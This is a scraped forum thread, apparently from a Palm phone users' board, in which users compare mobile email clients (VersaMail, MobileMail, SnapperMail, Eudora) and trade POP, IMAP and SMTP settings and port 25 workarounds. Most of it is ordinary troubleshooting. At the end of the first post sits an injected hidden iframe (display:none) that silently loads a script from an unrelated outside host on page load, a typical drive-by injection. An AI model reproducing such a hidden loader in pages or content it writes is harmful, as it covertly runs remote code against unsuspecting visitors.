Can you sync mobile mail with outlook and your phone or is it just for getting and sending mail from the phone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Just posted to palm.com this week: VersaMail 2.0 !!!
This is the same app that they're offering for free with the new Tungsten handhelds. It is based on the old MultiMail Deluxe software.
The only downsides I can see thus far is it doesn't support secure IMAP4 (IMAP using SSL), and you can't store the email database on the SD/MMC card (although you can store attachments on the removable media).
So far, so good. The interface is much improved over MultiMail, and it seems quite stable. Full review after I kick the tires some more.
Sounds good Mike! -- I can't wait to hear your review...what type of Mail server are you connecting to? pop3? IMAP -Microsoft Exchange, Lotus Domino, and Sun’s iPlanet?
No, I'm currently connecting right from VersaMail to the IMAP server, so everything is plaintext. Yeah, I'm really quite weary of the security consequences, but I've mitigated that a bit by NOT having my shell login the same as the email account. However, passwords and data is still plaintext, and I'm very weary of it. I'm bugging Palm every week or so about adding IMAP SSL support
One of the email allpications that came on the CD with the 7135 is called MobileMail. Has any one been able to get this to work with Alltel services. I have tried Eudora and SnapperMail and they work, but SnapperMail costs too much and MobileMail is free and can view some attachments. I use Earthlink as my main email service provider, but want to use POP with MobileMail and can not get it to send or receive. I have searched through the forums, but had no luck on finding an answer.
I looked at that site, but it looks like you will need to give up a lot of information about your phone, IP address, serial number on phone and a few other things that I think is a little to personal. I just want to be able to download a program to the 7135 that will allow me to check my email and view attachments on earthlink and search the web without giving up a lot of information.

No - you selected the wrong option. Just select CDMA type phone, and you don't need to enter the other stuff, just your e-mail address.

Costs too much?
:dunno
How much is a workable solution to a problem really worth? :dunno I guess it depends on how much the problem costs you. I bought it to use with my 6135. My use is this sometimes I need a file or program but don't want to keep it on the phone because of the size or if my phone crashes I'll lose that pgm.
I moved SM to flash as my main email pgm. Then I send myself a couple of emails with certain files or pgms zipped in the email. That way I'm able to connect and download the file when needed, and re-load it.
I decided on this route when my phone crashed, SM was in Flash so was my settings for it (backed-up). My co-worker came up with the idea of emailing the files to me if I could find a computer to connect my data cable to. That caused me to try having the files sent my phones email account. I then downloaded the files I needed unzipped them on my phone (with the included zip pgm) and was able to continue on my way.
I purchased the lifetime upgrade when I got home.

I agree with you on the cost. Because of the traveling I do, I like checking email on the go to see if an important email was sent to me. Once in a while the email will have an important attachment that I need to open and if my phone want allow me to open it, I well need to wait till I check in a hotel and use my notebook. I have QuickOffice setup and acrobat reader on my 7135 but Eudora will not work with the other programs to open attachements. I can save any large attachment to the 256SD card I purchased. Like I said, Snapper costs to much and 2banywhere is not working correctly for me. By the description of MobileMail that came on the CD, it looks like it would do what I want, but I am having problems getting it to work with Earthlink.
Anybody had these errors with Mobile Mail?
I'm using AT&T as my POP3. It seems to connect, but then gives me a message that I need to check my server name....
If I change things to <ipostoffice.....> and <imailhost.......> (opposed to just mailhost and postoffice; of course changing port settings,) it times out every time.
Any ideas? I'd like to try to use the (free) SW that came with if possible....
Many thanks,
Beth
Appropriate settings for ATT&T stuff can be found at www.wurd.com
I had some problems with email intitially, especially on Express Network. I switched to Snapper Mail and that solved most of them. I agee with kniteman, SM solves a problem and that was worth the cost of the software for me.
I still had problems sending mail. I found that most ISP's use port 25 blocking (the port used to send mail). That prevents you from sending email through their servers unless you are logged on to their network. It's supposed to make it difficult for spammers to highjack your account to do mass mailings. I just had Verizon set up an airbridge account and use that as my smtp server. For the pop account I use the regular ISP account. Everything works very well now in Snapper Mail and Eudora. I haven't tried Mobile Mail yet.
I did have some trouble getting Expess Network to function properly at first. I found the trick was to create a completely new service account and use the settings posted elsewhere in this forum. For some reason, modifying an existing service setting, even if the settings were correct, didn't work for me.

Have you tried the Airbridge (Verizon) solution as using mail.airbridge.net as your outgoing (SMTP) server? It has worked for me, and I guess jcatan as well.
